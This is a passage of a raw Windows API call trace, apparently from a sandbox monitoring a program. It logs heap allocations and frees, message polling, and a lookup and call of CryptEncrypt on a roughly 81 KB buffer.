returned 1 [0146.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0146.195] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0146.195] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0146.195] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0146.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0146.196] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0146.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0146.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0146.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0146.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0146.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0146.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0146.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0146.196] CharLowerBuffW (in: lpsz="byte[80976]", cchLength=0xb | out: lpsz="byte[80976]") returned 0xb [0146.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0146.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0146.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0146.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0146.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0146.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0146.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0146.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0146.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0146.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0146.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0146.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0146.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0146.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0146.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0146.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0146.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c50) returned 0x2e90338 [0146.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0146.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0146.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0146.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0146.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0146.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0146.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0146.201] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0146.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c4e) returned 0x2ea3f90 [0146.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0146.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c4e) returned 0x2eb7be8 [0146.210] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0146.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0146.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0146.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0146.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0146.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0146.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0146.210] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0146.211] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0146.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0146.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0146.214] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0146.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0146.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0146.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0146.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0146.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50ae8 [0146.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ae8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0146.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0146.214] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0146.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0146.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0146.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e544e0 [0146.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0146.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0146.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0146.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0146.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0146.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0146.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0146.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0146.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0146.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0146.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0146.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0146.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0146.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0146.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0146.215] CryptEncrypt (in: hKey=0xa87410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e90338*, pdwDataLen=0x8cef60*=0x13c4e, dwBufLen=0x13c50 | out: pbData=0x2e90338*, pdwDataLen=0x8cef60*=0x13c50) returned 1 [0146.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0146.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0146.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0146.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0146.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0146.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0146.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0146.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0146.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0146.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0146.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0146.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0146.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0146.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0146.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0146.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0146.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0146.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0146.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0146.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0146.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0146.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0146.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0146.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0146.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0146.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0146.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0146.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0146.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0146.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0146.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0146.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0146.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0146.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0146.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0146.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0146.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0146.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0146.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0146.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0146.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0146.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0146.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0146.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0146.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0146.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0146.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0146.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0146.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0146.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0146.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0146.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0146.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0146.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0146.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0146.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0146.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0146.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0146.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0146.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0146.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0146.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0146.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0146.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0146.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0146.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0146.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0146.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0146.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0146.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0146.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0146.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 